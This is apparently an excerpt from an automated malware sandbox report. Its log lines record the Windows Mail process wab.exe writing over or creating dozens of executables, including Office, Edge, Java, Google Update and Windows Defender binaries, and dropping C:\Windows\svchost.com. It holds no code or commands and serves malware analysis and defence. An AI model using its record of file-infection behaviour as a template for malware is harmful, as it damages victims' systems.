              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
